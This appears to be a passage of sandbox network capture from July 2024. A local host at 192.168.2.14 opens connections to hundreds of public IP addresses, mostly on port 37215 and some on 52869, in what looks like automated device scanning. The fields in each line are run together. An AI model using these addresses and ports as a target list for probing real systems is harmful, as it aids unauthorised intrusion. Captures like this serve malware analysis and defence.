                                                Jul 20, 2024 23:05:34.648559093 CEST2645437215192.168.2.1467.132.15.129
                                                Jul 20, 2024 23:05:34.648559093 CEST2645437215192.168.2.1441.144.209.211
                                                Jul 20, 2024 23:05:34.648559093 CEST2645437215192.168.2.1447.6.99.38
                                                Jul 20, 2024 23:05:34.648559093 CEST2645437215192.168.2.14197.73.16.180
                                                Jul 20, 2024 23:05:34.648559093 CEST2645437215192.168.2.1441.110.128.12
                                                Jul 20, 2024 23:05:34.648559093 CEST2645437215192.168.2.14157.13.240.1
                                                Jul 20, 2024 23:05:34.648785114 CEST2645437215192.168.2.1441.9.25.220
                                                Jul 20, 2024 23:05:34.648785114 CEST2645437215192.168.2.14197.153.179.38
                                                Jul 20, 2024 23:05:34.648785114 CEST2645437215192.168.2.14157.79.154.162
                                                Jul 20, 2024 23:05:34.648785114 CEST2645437215192.168.2.14197.234.0.163
                                                Jul 20, 2024 23:05:34.648785114 CEST2645437215192.168.2.1441.14.56.247
                                                Jul 20, 2024 23:05:34.648785114 CEST2645437215192.168.2.1486.143.164.212
                                                Jul 20, 2024 23:05:34.648785114 CEST2645437215192.168.2.14197.60.242.146
                                                Jul 20, 2024 23:05:34.648785114 CEST2645437215192.168.2.14157.23.35.67
                                                Jul 20, 2024 23:05:34.648946047 CEST3721526454197.176.242.224192.168.2.14
                                                Jul 20, 2024 23:05:34.649250031 CEST372152645441.121.158.33192.168.2.14
                                                Jul 20, 2024 23:05:34.649415970 CEST3721526454111.137.238.205192.168.2.14
                                                Jul 20, 2024 23:05:34.649672031 CEST3721526454157.240.88.96192.168.2.14
                                                Jul 20, 2024 23:05:34.649808884 CEST372152645441.171.2.165192.168.2.14
                                                Jul 20, 2024 23:05:34.649871111 CEST3721526454200.67.132.179192.168.2.14
                                                Jul 20, 2024 23:05:34.649935961 CEST372152645440.24.9.103192.168.2.14
                                                Jul 20, 2024 23:05:34.650012970 CEST3721526454197.62.9.39192.168.2.14
                                                Jul 20, 2024 23:05:34.650213957 CEST3721526454154.203.220.236192.168.2.14
                                                Jul 20, 2024 23:05:34.650302887 CEST3721526454197.208.158.70192.168.2.14
                                                Jul 20, 2024 23:05:34.650362015 CEST3721526454157.231.253.49192.168.2.14
                                                Jul 20, 2024 23:05:34.650417089 CEST4690252869192.168.2.14114.248.35.135
                                                Jul 20, 2024 23:05:34.650476933 CEST3721526454180.34.137.81192.168.2.14
                                                Jul 20, 2024 23:05:34.650722980 CEST3721526454197.197.32.221192.168.2.14
                                                Jul 20, 2024 23:05:34.650728941 CEST3721526454197.44.182.98192.168.2.14
                                                Jul 20, 2024 23:05:34.650738001 CEST372152645441.193.96.250192.168.2.14
                                                Jul 20, 2024 23:05:34.651082039 CEST3721526454197.141.187.145192.168.2.14
                                                Jul 20, 2024 23:05:34.651379108 CEST372152645441.215.142.215192.168.2.14
                                                Jul 20, 2024 23:05:34.651384115 CEST372152645445.33.195.117192.168.2.14
                                                Jul 20, 2024 23:05:34.651443005 CEST2645437215192.168.2.14197.36.183.229
                                                Jul 20, 2024 23:05:34.651443005 CEST2645437215192.168.2.14197.13.99.213
                                                Jul 20, 2024 23:05:34.651443005 CEST2645437215192.168.2.14190.178.118.15
                                                Jul 20, 2024 23:05:34.651443005 CEST2645437215192.168.2.1441.158.144.217
                                                Jul 20, 2024 23:05:34.651443005 CEST2645437215192.168.2.14182.13.206.102
                                                Jul 20, 2024 23:05:34.651443005 CEST2645437215192.168.2.1441.93.139.165
                                                Jul 20, 2024 23:05:34.651443005 CEST2645437215192.168.2.1441.25.204.106
                                                Jul 20, 2024 23:05:34.651443005 CEST2645437215192.168.2.14197.181.41.99
                                                Jul 20, 2024 23:05:34.651525021 CEST372152645441.208.227.202192.168.2.14
                                                Jul 20, 2024 23:05:34.651611090 CEST3721526454157.68.19.253192.168.2.14
                                                Jul 20, 2024 23:05:34.651896000 CEST37215604541.160.229.40192.168.2.14
                                                Jul 20, 2024 23:05:34.651951075 CEST3721526454157.157.247.178192.168.2.14
                                                Jul 20, 2024 23:05:34.652080059 CEST372152645441.37.192.32192.168.2.14
                                                Jul 20, 2024 23:05:34.652170897 CEST3721551668157.28.53.140192.168.2.14
                                                Jul 20, 2024 23:05:34.652324915 CEST2645437215192.168.2.14157.30.97.79
                                                Jul 20, 2024 23:05:34.652324915 CEST2645437215192.168.2.14105.138.173.57
                                                Jul 20, 2024 23:05:34.652324915 CEST2645437215192.168.2.14197.30.234.26
                                                Jul 20, 2024 23:05:34.652324915 CEST2645437215192.168.2.14104.114.78.57
                                                Jul 20, 2024 23:05:34.652324915 CEST2645437215192.168.2.14197.234.230.95
                                                Jul 20, 2024 23:05:34.652324915 CEST2645437215192.168.2.14129.9.101.117
                                                Jul 20, 2024 23:05:34.652324915 CEST2645437215192.168.2.1441.151.195.67
                                                Jul 20, 2024 23:05:34.652324915 CEST2645437215192.168.2.14103.250.79.214
                                                Jul 20, 2024 23:05:34.652422905 CEST2645437215192.168.2.14197.60.175.77
                                                Jul 20, 2024 23:05:34.652422905 CEST2645437215192.168.2.14126.26.174.96
                                                Jul 20, 2024 23:05:34.652422905 CEST4809437215192.168.2.14157.153.180.139
                                                Jul 20, 2024 23:05:34.652422905 CEST4600837215192.168.2.14197.164.107.109
                                                Jul 20, 2024 23:05:34.652422905 CEST4751037215192.168.2.1434.202.46.128
                                                Jul 20, 2024 23:05:34.652422905 CEST6031237215192.168.2.14197.160.70.240
                                                Jul 20, 2024 23:05:34.652422905 CEST3654237215192.168.2.14197.81.135.223
                                                Jul 20, 2024 23:05:34.652422905 CEST5481837215192.168.2.14197.145.253.73
                                                Jul 20, 2024 23:05:34.652796984 CEST3721526454218.49.223.59192.168.2.14
                                                Jul 20, 2024 23:05:34.653036118 CEST3721526454161.108.94.20192.168.2.14
                                                Jul 20, 2024 23:05:34.653253078 CEST4995037215192.168.2.14157.76.186.37
                                                Jul 20, 2024 23:05:34.653253078 CEST3950637215192.168.2.14157.51.200.31
                                                Jul 20, 2024 23:05:34.653253078 CEST4333837215192.168.2.14197.144.99.86
                                                Jul 20, 2024 23:05:34.653253078 CEST5704437215192.168.2.1441.179.93.180
                                                Jul 20, 2024 23:05:34.653253078 CEST4126237215192.168.2.1441.124.78.80
                                                Jul 20, 2024 23:05:34.653253078 CEST5184437215192.168.2.14183.188.212.130
                                                Jul 20, 2024 23:05:34.653253078 CEST3851637215192.168.2.1464.130.174.77
                                                Jul 20, 2024 23:05:34.653253078 CEST5208437215192.168.2.14197.36.42.86
                                                Jul 20, 2024 23:05:34.653328896 CEST372154423241.219.3.184192.168.2.14
                                                Jul 20, 2024 23:05:34.653340101 CEST372152645489.110.22.12192.168.2.14
                                                Jul 20, 2024 23:05:34.653346062 CEST3721526454197.168.79.126192.168.2.14
                                                Jul 20, 2024 23:05:34.653362989 CEST372152645441.216.136.43192.168.2.14
                                                Jul 20, 2024 23:05:34.653367996 CEST372152645441.118.191.62192.168.2.14
                                                Jul 20, 2024 23:05:34.653373957 CEST3721526454197.234.114.168192.168.2.14
                                                Jul 20, 2024 23:05:34.653799057 CEST3721557442157.16.85.248192.168.2.14
                                                Jul 20, 2024 23:05:34.654244900 CEST3721526454197.126.43.234192.168.2.14
                                                Jul 20, 2024 23:05:34.654273033 CEST2645437215192.168.2.14157.212.11.61
                                                Jul 20, 2024 23:05:34.654273033 CEST2645437215192.168.2.14157.103.86.121
                                                Jul 20, 2024 23:05:34.654273033 CEST2645437215192.168.2.14197.105.160.211
                                                Jul 20, 2024 23:05:34.654273987 CEST2645437215192.168.2.1423.57.107.80
                                                Jul 20, 2024 23:05:34.654273987 CEST2645437215192.168.2.14157.144.68.76
                                                Jul 20, 2024 23:05:34.654273987 CEST2645437215192.168.2.1441.202.145.26
                                                Jul 20, 2024 23:05:34.654273987 CEST5102237215192.168.2.1491.134.129.146
                                                Jul 20, 2024 23:05:34.654273987 CEST5251837215192.168.2.14197.49.145.149
                                                Jul 20, 2024 23:05:34.654434919 CEST3721526454178.60.140.231192.168.2.14
                                                Jul 20, 2024 23:05:34.654671907 CEST2645437215192.168.2.14157.69.182.132
                                                Jul 20, 2024 23:05:34.654671907 CEST2645437215192.168.2.14157.129.248.161
                                                Jul 20, 2024 23:05:34.654671907 CEST2645437215192.168.2.14197.66.178.193
                                                Jul 20, 2024 23:05:34.654671907 CEST2645437215192.168.2.1476.110.225.69
                                                Jul 20, 2024 23:05:34.654671907 CEST2645437215192.168.2.14157.134.217.137
                                                Jul 20, 2024 23:05:34.654671907 CEST2645437215192.168.2.14197.245.218.40
                                                Jul 20, 2024 23:05:34.654671907 CEST2645437215192.168.2.14157.109.103.136
                                                Jul 20, 2024 23:05:34.654671907 CEST2645437215192.168.2.14197.163.146.52
                                                Jul 20, 2024 23:05:34.654772043 CEST3721551144136.230.51.161192.168.2.14
                                                Jul 20, 2024 23:05:34.654783010 CEST3721526454197.103.58.85192.168.2.14
                                                Jul 20, 2024 23:05:34.655119896 CEST37215264549.147.175.154192.168.2.14
                                                Jul 20, 2024 23:05:34.655373096 CEST3721543456197.167.43.41192.168.2.14
                                                Jul 20, 2024 23:05:34.655874968 CEST372152645441.9.25.220192.168.2.14
                                                Jul 20, 2024 23:05:34.655994892 CEST3721539756157.12.154.103192.168.2.14
                                                Jul 20, 2024 23:05:34.656049967 CEST3721526454197.8.168.32192.168.2.14
                                                Jul 20, 2024 23:05:34.656192064 CEST4246237215192.168.2.14197.86.55.32
                                                Jul 20, 2024 23:05:34.656192064 CEST5261637215192.168.2.14197.91.156.105
                                                Jul 20, 2024 23:05:34.656192064 CEST4791837215192.168.2.1499.80.150.223
                                                Jul 20, 2024 23:05:34.656192064 CEST3699037215192.168.2.14157.40.221.74
                                                Jul 20, 2024 23:05:34.656192064 CEST6004637215192.168.2.14157.233.107.21
                                                Jul 20, 2024 23:05:34.656192064 CEST3480037215192.168.2.14197.232.70.152
                                                Jul 20, 2024 23:05:34.656192064 CEST5917037215192.168.2.1457.147.31.177
                                                Jul 20, 2024 23:05:34.656192064 CEST5600237215192.168.2.14157.155.131.147
                                                Jul 20, 2024 23:05:34.656538010 CEST3721526454197.153.179.38192.168.2.14
                                                Jul 20, 2024 23:05:34.656564951 CEST4490252869192.168.2.14116.137.1.46
                                                Jul 20, 2024 23:05:34.656735897 CEST3721526454121.216.234.55192.168.2.14
                                                Jul 20, 2024 23:05:34.656975985 CEST372152645441.82.55.231192.168.2.14
                                                Jul 20, 2024 23:05:34.657114029 CEST3721526454157.79.154.162192.168.2.14
                                                Jul 20, 2024 23:05:34.657123089 CEST5848437215192.168.2.14151.249.104.249
                                                Jul 20, 2024 23:05:34.657123089 CEST5550437215192.168.2.1490.121.157.161
                                                Jul 20, 2024 23:05:34.657123089 CEST6083837215192.168.2.14197.127.169.149
                                                Jul 20, 2024 23:05:34.657123089 CEST5952837215192.168.2.14193.24.185.130
                                                Jul 20, 2024 23:05:34.657123089 CEST5255037215192.168.2.1441.206.29.121
                                                Jul 20, 2024 23:05:34.657123089 CEST4688237215192.168.2.14197.26.201.125
                                                Jul 20, 2024 23:05:34.657123089 CEST3618037215192.168.2.14157.131.171.170
                                                Jul 20, 2024 23:05:34.657123089 CEST3755237215192.168.2.1441.45.136.104
                                                Jul 20, 2024 23:05:34.657262087 CEST2645437215192.168.2.14197.243.103.168
                                                Jul 20, 2024 23:05:34.657262087 CEST2645437215192.168.2.14197.151.169.169
                                                Jul 20, 2024 23:05:34.657262087 CEST2645437215192.168.2.1441.37.32.101
                                                Jul 20, 2024 23:05:34.657262087 CEST3854837215192.168.2.1441.145.104.135
                                                Jul 20, 2024 23:05:34.657263041 CEST5312037215192.168.2.1441.14.60.190
                                                Jul 20, 2024 23:05:34.657263041 CEST3783037215192.168.2.14157.89.217.112
                                                Jul 20, 2024 23:05:34.657263041 CEST5270837215192.168.2.14130.150.233.95
                                                Jul 20, 2024 23:05:34.657263041 CEST3445237215192.168.2.1441.155.35.213
                                                Jul 20, 2024 23:05:34.657322884 CEST372152645459.77.214.201192.168.2.14
                                                Jul 20, 2024 23:05:34.657354116 CEST3721526454197.234.0.163192.168.2.14
                                                Jul 20, 2024 23:05:34.657361984 CEST3721526454157.120.205.32192.168.2.14
                                                Jul 20, 2024 23:05:34.657605886 CEST372152645493.136.213.232192.168.2.14
                                                Jul 20, 2024 23:05:34.657696009 CEST5286946902114.248.35.135192.168.2.14
                                                Jul 20, 2024 23:05:34.657757044 CEST4690252869192.168.2.14114.248.35.135
                                                Jul 20, 2024 23:05:34.658684015 CEST5166837215192.168.2.14157.28.53.140
                                                Jul 20, 2024 23:05:34.658684015 CEST5744237215192.168.2.14157.16.85.248
                                                Jul 20, 2024 23:05:34.658684015 CEST5114437215192.168.2.14136.230.51.161
                                                Jul 20, 2024 23:05:34.658684015 CEST4345637215192.168.2.14197.167.43.41
                                                Jul 20, 2024 23:05:34.658684015 CEST3975637215192.168.2.14157.12.154.103
                                                Jul 20, 2024 23:05:34.658684015 CEST4334437215192.168.2.1441.75.56.150
                                                Jul 20, 2024 23:05:34.658684015 CEST5765437215192.168.2.14197.155.87.199
                                                Jul 20, 2024 23:05:34.658684015 CEST4446037215192.168.2.14197.183.189.239
                                                Jul 20, 2024 23:05:34.659339905 CEST372152645467.132.15.129192.168.2.14
                                                Jul 20, 2024 23:05:34.659344912 CEST372152645441.144.209.211192.168.2.14
                                                Jul 20, 2024 23:05:34.659353971 CEST3721526454157.114.13.77192.168.2.14
                                                Jul 20, 2024 23:05:34.659616947 CEST5857637215192.168.2.14157.230.63.1
                                                Jul 20, 2024 23:05:34.659616947 CEST4610037215192.168.2.14157.175.25.122
                                                Jul 20, 2024 23:05:34.659616947 CEST3620837215192.168.2.14197.143.99.76
                                                Jul 20, 2024 23:05:34.659617901 CEST5594237215192.168.2.1441.141.203.96
                                                Jul 20, 2024 23:05:34.659617901 CEST4475437215192.168.2.14167.133.59.154
                                                Jul 20, 2024 23:05:34.659617901 CEST4974237215192.168.2.14197.152.249.5
                                                Jul 20, 2024 23:05:34.659617901 CEST6064437215192.168.2.14106.240.47.148
                                                Jul 20, 2024 23:05:34.659617901 CEST4740837215192.168.2.14109.251.14.201
                                                Jul 20, 2024 23:05:34.659636021 CEST3721526454197.88.59.74192.168.2.14
                                                Jul 20, 2024 23:05:34.659641981 CEST372152645447.6.99.38192.168.2.14
                                                Jul 20, 2024 23:05:34.659651995 CEST3721526454197.36.183.229192.168.2.14
                                                Jul 20, 2024 23:05:34.659657001 CEST372152645441.14.56.247192.168.2.14
                                                Jul 20, 2024 23:05:34.659665108 CEST3721526454197.73.16.180192.168.2.14
                                                Jul 20, 2024 23:05:34.659670115 CEST3721526454197.13.99.213192.168.2.14
                                                Jul 20, 2024 23:05:34.659673929 CEST372152645486.143.164.212192.168.2.14
                                                Jul 20, 2024 23:05:34.659678936 CEST3721526454190.178.118.15192.168.2.14
                                                Jul 20, 2024 23:05:34.659687996 CEST3721526454197.60.242.146192.168.2.14
                                                Jul 20, 2024 23:05:34.659693003 CEST3721526454216.0.205.44192.168.2.14
                                                Jul 20, 2024 23:05:34.659702063 CEST3721526454157.23.35.67192.168.2.14
                                                Jul 20, 2024 23:05:34.659707069 CEST3721526454157.30.97.79192.168.2.14
                                                Jul 20, 2024 23:05:34.659714937 CEST372152645441.110.128.12192.168.2.14
                                                Jul 20, 2024 23:05:34.659719944 CEST372152645441.158.144.217192.168.2.14
                                                Jul 20, 2024 23:05:34.659723997 CEST3721557654197.155.87.199192.168.2.14
                                                Jul 20, 2024 23:05:34.659737110 CEST3721526454197.60.175.77192.168.2.14
                                                Jul 20, 2024 23:05:34.659742117 CEST3721526454157.13.240.1192.168.2.14
                                                Jul 20, 2024 23:05:34.659749985 CEST3721544460197.183.189.239192.168.2.14
                                                Jul 20, 2024 23:05:34.659754992 CEST3721526454182.13.206.102192.168.2.14
                                                Jul 20, 2024 23:05:34.660343885 CEST5952437215192.168.2.14157.252.199.36
                                                Jul 20, 2024 23:05:34.660343885 CEST5644437215192.168.2.1450.34.155.192
                                                Jul 20, 2024 23:05:34.660343885 CEST4333237215192.168.2.1441.7.174.17
                                                Jul 20, 2024 23:05:34.660343885 CEST4995037215192.168.2.14157.76.186.37
                                                Jul 20, 2024 23:05:34.660343885 CEST3950637215192.168.2.14157.51.200.31
                                                Jul 20, 2024 23:05:34.660343885 CEST4333837215192.168.2.14197.144.99.86
                                                Jul 20, 2024 23:05:34.660343885 CEST5704437215192.168.2.1441.179.93.180
                                                Jul 20, 2024 23:05:34.660343885 CEST4126237215192.168.2.1441.124.78.80
                                                Jul 20, 2024 23:05:34.660419941 CEST4809437215192.168.2.14157.153.180.139
                                                Jul 20, 2024 23:05:34.660419941 CEST4600837215192.168.2.14197.164.107.109
                                                Jul 20, 2024 23:05:34.660419941 CEST4751037215192.168.2.1434.202.46.128
                                                Jul 20, 2024 23:05:34.660419941 CEST6031237215192.168.2.14197.160.70.240
                                                Jul 20, 2024 23:05:34.660419941 CEST3654237215192.168.2.14197.81.135.223
                                                Jul 20, 2024 23:05:34.660419941 CEST5481837215192.168.2.14197.145.253.73
                                                Jul 20, 2024 23:05:34.660419941 CEST4246237215192.168.2.14197.86.55.32
                                                Jul 20, 2024 23:05:34.660419941 CEST5261637215192.168.2.14197.91.156.105
                                                Jul 20, 2024 23:05:34.660657883 CEST2645437215192.168.2.14157.173.110.253
                                                Jul 20, 2024 23:05:34.661756039 CEST4692637215192.168.2.14197.1.185.169
                                                Jul 20, 2024 23:05:34.661756039 CEST4334437215192.168.2.1441.75.56.150
                                                Jul 20, 2024 23:05:34.661756039 CEST4334437215192.168.2.1441.75.56.150
                                                Jul 20, 2024 23:05:34.661756039 CEST2645437215192.168.2.1441.60.177.13
                                                Jul 20, 2024 23:05:34.661756039 CEST2645437215192.168.2.14157.241.110.249
                                                Jul 20, 2024 23:05:34.661756039 CEST2645437215192.168.2.14209.16.9.12
                                                Jul 20, 2024 23:05:34.661756039 CEST2645437215192.168.2.14197.199.66.253
                                                Jul 20, 2024 23:05:34.661756039 CEST2645437215192.168.2.1481.154.48.7
                                                Jul 20, 2024 23:05:34.662338018 CEST3280037215192.168.2.14197.122.120.132
                                                Jul 20, 2024 23:05:34.662338018 CEST5689637215192.168.2.1447.121.106.191
                                                Jul 20, 2024 23:05:34.662338018 CEST3526837215192.168.2.14157.74.195.83
                                                Jul 20, 2024 23:05:34.662338018 CEST3748237215192.168.2.14197.163.208.222
                                                Jul 20, 2024 23:05:34.662338018 CEST5513837215192.168.2.14157.221.219.70
                                                Jul 20, 2024 23:05:34.662338018 CEST3840237215192.168.2.1461.98.235.91
                                                Jul 20, 2024 23:05:34.662338018 CEST3555037215192.168.2.14157.38.118.86
                                                Jul 20, 2024 23:05:34.662338018 CEST3373237215192.168.2.14197.152.47.25
                                                Jul 20, 2024 23:05:34.662484884 CEST3414637215192.168.2.1441.124.231.107
                                                Jul 20, 2024 23:05:34.662484884 CEST3344237215192.168.2.1441.212.223.17
                                                Jul 20, 2024 23:05:34.662484884 CEST4896037215192.168.2.14157.182.60.47
                                                Jul 20, 2024 23:05:34.662484884 CEST5357837215192.168.2.14197.101.55.74
                                                Jul 20, 2024 23:05:34.662484884 CEST3892037215192.168.2.1441.188.190.222
                                                Jul 20, 2024 23:05:34.662484884 CEST3308837215192.168.2.1478.116.111.6
                                                Jul 20, 2024 23:05:34.662484884 CEST5102237215192.168.2.1491.134.129.146
                                                Jul 20, 2024 23:05:34.662484884 CEST5251837215192.168.2.14197.49.145.149
                                                Jul 20, 2024 23:05:34.662928104 CEST4791837215192.168.2.1499.80.150.223
                                                Jul 20, 2024 23:05:34.662928104 CEST3699037215192.168.2.14157.40.221.74
                                                Jul 20, 2024 23:05:34.662928104 CEST6004637215192.168.2.14157.233.107.21
                                                Jul 20, 2024 23:05:34.662928104 CEST3480037215192.168.2.14197.232.70.152
                                                Jul 20, 2024 23:05:34.662929058 CEST5917037215192.168.2.1457.147.31.177
                                                Jul 20, 2024 23:05:34.662929058 CEST5600237215192.168.2.14157.155.131.147
                                                Jul 20, 2024 23:05:34.662929058 CEST2645437215192.168.2.1472.99.99.186
                                                Jul 20, 2024 23:05:34.662929058 CEST2645437215192.168.2.14115.17.56.208
                                                Jul 20, 2024 23:05:34.663306952 CEST5184437215192.168.2.14183.188.212.130
                                                Jul 20, 2024 23:05:34.663306952 CEST3851637215192.168.2.1464.130.174.77
                                                Jul 20, 2024 23:05:34.663306952 CEST5208437215192.168.2.14197.36.42.86
                                                Jul 20, 2024 23:05:34.663306952 CEST5848437215192.168.2.14151.249.104.249
                                                Jul 20, 2024 23:05:34.663306952 CEST5550437215192.168.2.1490.121.157.161
                                                Jul 20, 2024 23:05:34.663306952 CEST6083837215192.168.2.14197.127.169.149
                                                Jul 20, 2024 23:05:34.663306952 CEST5255037215192.168.2.1441.206.29.121
                                                Jul 20, 2024 23:05:34.663306952 CEST5952837215192.168.2.14193.24.185.130
                                                Jul 20, 2024 23:05:34.663517952 CEST2645437215192.168.2.1458.64.123.253
                                                Jul 20, 2024 23:05:34.663517952 CEST2645437215192.168.2.14157.57.125.1
                                                Jul 20, 2024 23:05:34.663517952 CEST2645437215192.168.2.14157.173.188.51
                                                Jul 20, 2024 23:05:34.663517952 CEST2645437215192.168.2.1441.112.8.124
                                                Jul 20, 2024 23:05:34.663518906 CEST4334437215192.168.2.1441.75.56.150
                                                Jul 20, 2024 23:05:34.663518906 CEST4692637215192.168.2.14197.1.185.169
                                                Jul 20, 2024 23:05:34.663518906 CEST4446037215192.168.2.14197.183.189.239
                                                Jul 20, 2024 23:05:34.664377928 CEST3897237215192.168.2.1444.66.223.184
                                                Jul 20, 2024 23:05:34.664377928 CEST3700037215192.168.2.1441.88.139.101
                                                Jul 20, 2024 23:05:34.664377928 CEST4998037215192.168.2.14197.21.229.2
                                                Jul 20, 2024 23:05:34.664377928 CEST4930237215192.168.2.14197.1.71.210
                                                Jul 20, 2024 23:05:34.664377928 CEST3854837215192.168.2.1441.145.104.135
                                                Jul 20, 2024 23:05:34.664377928 CEST5312037215192.168.2.1441.14.60.190
                                                Jul 20, 2024 23:05:34.664377928 CEST3783037215192.168.2.14157.89.217.112
                                                Jul 20, 2024 23:05:34.664377928 CEST5270837215192.168.2.14130.150.233.95
                                                Jul 20, 2024 23:05:34.664836884 CEST5857637215192.168.2.14157.230.63.1
                                                Jul 20, 2024 23:05:34.664836884 CEST4610037215192.168.2.14157.175.25.122
                                                Jul 20, 2024 23:05:34.664836884 CEST3620837215192.168.2.14197.143.99.76
                                                Jul 20, 2024 23:05:34.664836884 CEST5594237215192.168.2.1441.141.203.96
                                                Jul 20, 2024 23:05:34.664836884 CEST4475437215192.168.2.14167.133.59.154
                                                Jul 20, 2024 23:05:34.664836884 CEST4974237215192.168.2.14197.152.249.5
                                                Jul 20, 2024 23:05:34.664838076 CEST6064437215192.168.2.14106.240.47.148
                                                Jul 20, 2024 23:05:34.664838076 CEST4740837215192.168.2.14109.251.14.201
                                                Jul 20, 2024 23:05:34.665823936 CEST4688237215192.168.2.14197.26.201.125
                                                Jul 20, 2024 23:05:34.665823936 CEST3618037215192.168.2.14157.131.171.170
                                                Jul 20, 2024 23:05:34.665823936 CEST3755237215192.168.2.1441.45.136.104
                                                Jul 20, 2024 23:05:34.665823936 CEST5952437215192.168.2.14157.252.199.36
                                                Jul 20, 2024 23:05:34.665823936 CEST5644437215192.168.2.1450.34.155.192
                                                Jul 20, 2024 23:05:34.665823936 CEST4333237215192.168.2.1441.7.174.17
                                                Jul 20, 2024 23:05:34.665823936 CEST2645437215192.168.2.14197.59.198.51
                                                Jul 20, 2024 23:05:34.665824890 CEST2645437215192.168.2.14157.66.61.45
                                                Jul 20, 2024 23:05:34.666305065 CEST3445237215192.168.2.1441.155.35.213
                                                Jul 20, 2024 23:05:34.666305065 CEST3280037215192.168.2.14197.122.120.132
                                                Jul 20, 2024 23:05:34.666305065 CEST5689637215192.168.2.1447.121.106.191
                                                Jul 20, 2024 23:05:34.666305065 CEST3526837215192.168.2.14157.74.195.83
                                                Jul 20, 2024 23:05:34.666305065 CEST3748237215192.168.2.14197.163.208.222
                                                Jul 20, 2024 23:05:34.666305065 CEST5513837215192.168.2.14157.221.219.70
                                                Jul 20, 2024 23:05:34.666305065 CEST3840237215192.168.2.1461.98.235.91
                                                Jul 20, 2024 23:05:34.666305065 CEST3555037215192.168.2.14157.38.118.86
                                                Jul 20, 2024 23:05:34.666649103 CEST3975637215192.168.2.14157.12.154.103
                                                Jul 20, 2024 23:05:34.666649103 CEST4345637215192.168.2.14197.167.43.41
                                                Jul 20, 2024 23:05:34.666649103 CEST5114437215192.168.2.14136.230.51.161
                                                Jul 20, 2024 23:05:34.666649103 CEST5744237215192.168.2.14157.16.85.248
                                                Jul 20, 2024 23:05:34.666649103 CEST5166837215192.168.2.14157.28.53.140
                                                Jul 20, 2024 23:05:34.666649103 CEST4423237215192.168.2.1441.219.3.184
                                                Jul 20, 2024 23:05:34.666649103 CEST6045437215192.168.2.141.160.229.40
                                                Jul 20, 2024 23:05:34.666649103 CEST2645437215192.168.2.14197.150.150.181
                                                Jul 20, 2024 23:05:34.666882038 CEST2645437215192.168.2.14197.235.65.47
                                                Jul 20, 2024 23:05:34.666882038 CEST2645437215192.168.2.14197.125.130.118
                                                Jul 20, 2024 23:05:34.666882038 CEST2645437215192.168.2.14131.26.31.236
                                                Jul 20, 2024 23:05:34.666882038 CEST2645437215192.168.2.1441.97.149.25
                                                Jul 20, 2024 23:05:34.666882038 CEST2645437215192.168.2.1441.253.179.250
                                                Jul 20, 2024 23:05:34.666882038 CEST2645437215192.168.2.14107.101.21.133
                                                Jul 20, 2024 23:05:34.666882992 CEST5600237215192.168.2.14157.155.131.147
                                                Jul 20, 2024 23:05:34.666882992 CEST5917037215192.168.2.1457.147.31.177
                                                Jul 20, 2024 23:05:34.667499065 CEST3414637215192.168.2.1441.124.231.107
                                                Jul 20, 2024 23:05:34.667499065 CEST3344237215192.168.2.1441.212.223.17
                                                Jul 20, 2024 23:05:34.667499065 CEST4896037215192.168.2.14157.182.60.47
                                                Jul 20, 2024 23:05:34.667499065 CEST5357837215192.168.2.14197.101.55.74
                                                Jul 20, 2024 23:05:34.667499065 CEST3892037215192.168.2.1441.188.190.222
                                                Jul 20, 2024 23:05:34.667499065 CEST3308837215192.168.2.1478.116.111.6
                                                Jul 20, 2024 23:05:34.667499065 CEST2645437215192.168.2.1441.19.128.6
                                                Jul 20, 2024 23:05:34.667499065 CEST2645437215192.168.2.1474.110.183.41
                                                Jul 20, 2024 23:05:34.667706013 CEST3721526454182.13.206.102192.168.2.14
                                                Jul 20, 2024 23:05:34.667715073 CEST372152645441.93.139.165192.168.2.14
                                                Jul 20, 2024 23:05:34.667716026 CEST3721526454105.138.173.57192.168.2.14
                                                Jul 20, 2024 23:05:34.667716980 CEST3721526454103.250.79.214192.168.2.14
                                                Jul 20, 2024 23:05:34.667717934 CEST3721526454126.26.174.96192.168.2.14
                                                Jul 20, 2024 23:05:34.667717934 CEST372152645441.25.204.106192.168.2.14
                                                Jul 20, 2024 23:05:34.667718887 CEST3721539506157.51.200.31192.168.2.14
                                                Jul 20, 2024 23:05:34.667720079 CEST3721548094157.153.180.139192.168.2.14
                                                Jul 20, 2024 23:05:34.667723894 CEST3721526454197.181.41.99192.168.2.14
                                                Jul 20, 2024 23:05:34.667726040 CEST3721526454197.30.234.26192.168.2.14
                                                Jul 20, 2024 23:05:34.667726994 CEST3721543338197.144.99.86192.168.2.14
                                                Jul 20, 2024 23:05:34.667727947 CEST3721526454157.103.86.121192.168.2.14
                                                Jul 20, 2024 23:05:34.667728901 CEST372154751034.202.46.128192.168.2.14
                                                Jul 20, 2024 23:05:34.667731047 CEST3721526454129.9.101.117192.168.2.14
                                                Jul 20, 2024 23:05:34.667732000 CEST3721536542197.81.135.223192.168.2.14
                                                Jul 20, 2024 23:05:34.667735100 CEST372152645423.57.107.80192.168.2.14
                                                Jul 20, 2024 23:05:34.667736053 CEST3721554818197.145.253.73192.168.2.14
                                                Jul 20, 2024 23:05:34.667740107 CEST372154126241.124.78.80192.168.2.14
                                                Jul 20, 2024 23:05:34.667741060 CEST3721551844183.188.212.130192.168.2.14
                                                Jul 20, 2024 23:05:34.667743921 CEST5286944902116.137.1.46192.168.2.14
                                                Jul 20, 2024 23:05:34.667745113 CEST3721546926197.1.185.169192.168.2.14
                                                Jul 20, 2024 23:05:34.667748928 CEST3721558484151.249.104.249192.168.2.14
                                                Jul 20, 2024 23:05:34.667749882 CEST3721552616197.91.156.105192.168.2.14
                                                Jul 20, 2024 23:05:34.667752028 CEST372154791899.80.150.223192.168.2.14
                                                Jul 20, 2024 23:05:34.667752028 CEST3721536990157.40.221.74192.168.2.14
                                                Jul 20, 2024 23:05:34.667756081 CEST3721526454197.151.169.169192.168.2.14
                                                Jul 20, 2024 23:05:34.667757034 CEST3721560046157.233.107.21192.168.2.14
                                                Jul 20, 2024 23:05:34.667759895 CEST372155550490.121.157.161192.168.2.14
                                                Jul 20, 2024 23:05:34.667761087 CEST3721547408109.251.14.201192.168.2.14
                                                Jul 20, 2024 23:05:34.667762041 CEST3721526454157.144.68.76192.168.2.14
                                                Jul 20, 2024 23:05:34.667762995 CEST372152645441.37.32.101192.168.2.14
                                                Jul 20, 2024 23:05:34.667762995 CEST3721560838197.127.169.149192.168.2.14
                                                Jul 20, 2024 23:05:34.667763948 CEST372152645441.202.145.26192.168.2.14
                                                Jul 20, 2024 23:05:34.667764902 CEST372153854841.145.104.135192.168.2.14
                                                Jul 20, 2024 23:05:34.667766094 CEST3721559528193.24.185.130192.168.2.14
                                                Jul 20, 2024 23:05:34.667768955 CEST3721534800197.232.70.152192.168.2.14
